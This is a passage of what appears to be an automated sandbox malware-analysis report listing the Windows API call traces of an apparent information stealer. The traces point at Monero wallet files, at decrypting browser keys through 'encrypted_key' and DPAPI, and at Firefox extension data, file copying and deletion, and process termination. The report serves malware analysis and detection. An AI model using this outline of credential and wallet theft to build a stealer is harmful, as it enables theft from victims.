                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003C951E,00000000), ref: 003C8D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C8D62
                            • wsprintfW.USER32 ref: 003C8D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 003BA3FF
                            • lstrlen.KERNEL32(00000000), ref: 003BA6BC
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 003BA743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD481
                            • lstrlen.KERNEL32(00000000), ref: 003BD698
                            • lstrlen.KERNEL32(00000000), ref: 003BD6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 003BD72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD801
                            • lstrlen.KERNEL32(00000000), ref: 003BD99F
                            • lstrlen.KERNEL32(00000000), ref: 003BD9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 003BDA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003D1580,003D0D92), ref: 003BF54C
                            • lstrlen.KERNEL32(00000000), ref: 003BF56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                              • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                              • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                              • Part of subcall function 003B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                              • Part of subcall function 003B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                              • Part of subcall function 003B9B60: LocalFree.KERNEL32(?), ref: 003B9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            APIs
                            • memset.MSVCRT ref: 003C94EB
                              • Part of subcall function 003C8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003C951E,00000000), ref: 003C8D5B
                              • Part of subcall function 003C8D50: RtlAllocateHeap.NTDLL(00000000), ref: 003C8D62
                              • Part of subcall function 003C8D50: wsprintfW.USER32 ref: 003C8D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 003C95AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 003C95C9
                            • CloseHandle.KERNEL32(00000000), ref: 003C95D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: e53adff21416d4238c7ea474ce73c81d7ede4d392a7bdb815256a1864b222f2b
                            • Instruction ID: 9df6da558f02dcb5d3649479d18ca5499956d16faa59e8c208a891ecd2c27ee9
                            • Opcode Fuzzy Hash: e53adff21416d4238c7ea474ce73c81d7ede4d392a7bdb815256a1864b222f2b
                            • Instruction Fuzzy Hash: 82311BB1E0120C9FDB15DBE0CD49FEDB778EB54300F104459E50AEA184DB78AE89DB52
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003D05B7), ref: 003C86CA
                            • Process32First.KERNEL32(?,00000128), ref: 003C86DE
                            • Process32Next.KERNEL32(?,00000128), ref: 003C86F3
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • CloseHandle.KERNEL32(?), ref: 003C8761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                            • Instruction ID: 309c1f561a85c6cfd6618800c09c82f851f31b100b83aa8be8b44db77f525d4f
                            • Opcode Fuzzy Hash: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                            • Instruction Fuzzy Hash: E7315C71901618ABCB26EB50DC45FEEB778EF45704F10419DE50AE61A0DF346E45CFA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E00,00000000,?), ref: 003C79B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C79B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,003D0E00,00000000,?), ref: 003C79C4
                            • wsprintfA.USER32 ref: 003C79F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                            • Instruction ID: 0fdebe0e43635d5d2503d0587a961c631e65f6cb5795419088d0bb46351dd7e5
                            • Opcode Fuzzy Hash: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                            • Instruction Fuzzy Hash: 2E1115B2904118ABCB149FC9DD45BBEB7F8FB48B11F10421AF605E2280E2795944DBB2
                            APIs
                            • __getptd.LIBCMT ref: 003CC74E
                              • Part of subcall function 003CBF9F: __amsg_exit.LIBCMT ref: 003CBFAF
                            • __getptd.LIBCMT ref: 003CC765
                            • __amsg_exit.LIBCMT ref: 003CC773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 003CC797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                            • Instruction ID: c51286c3d6e5bdf1fc6bbae6aad283d273d37148f361f4034b19d5e0ac6673c2
                            • Opcode Fuzzy Hash: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                            • Instruction Fuzzy Hash: 64F090329156149FDB23BBB86C07F5DB3A0AF00724F25514DF408EE2D2CB645D409F56
                            APIs
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4F7A
                            • lstrcat.KERNEL32(?,003D1070), ref: 003C4F97
                            • lstrcat.KERNEL32(?,01089058), ref: 003C4FAB
                            • lstrcat.KERNEL32(?,003D1074), ref: 003C4FBD
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                              • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                              • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                              • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                            • Instruction ID: 080dcad8e4f3baff790ae4c296ea466eb29b49efab4b3f8174de317bdc6c4008
                            • Opcode Fuzzy Hash: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                            • Instruction Fuzzy Hash: AD21A7B690020867C755F760EC46FE9333CAB54700F004549B64DDA181EE759ACDDBA3